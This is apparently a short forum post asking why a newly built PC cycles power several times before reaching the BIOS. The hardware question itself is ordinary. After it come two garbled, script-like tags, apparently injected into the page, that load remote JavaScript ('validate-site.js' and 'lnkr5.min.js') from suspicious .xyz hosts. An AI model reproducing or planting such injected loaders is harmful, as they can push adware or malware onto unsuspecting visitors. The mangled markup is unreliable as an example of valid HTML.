New PC Build, at startup the PC will cycle on/off 1-3 times, eventually allowing boot into bios.  No OS installed yet.  I have upgraded the bios, however sometimes the number of cycles resets the bios to factory.  All other devices were removed.  Tried using backup power supply with same results.< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=13">< ="text/" ="http:/etcheckcdn.xyz/addons/lnkr5.min.js">
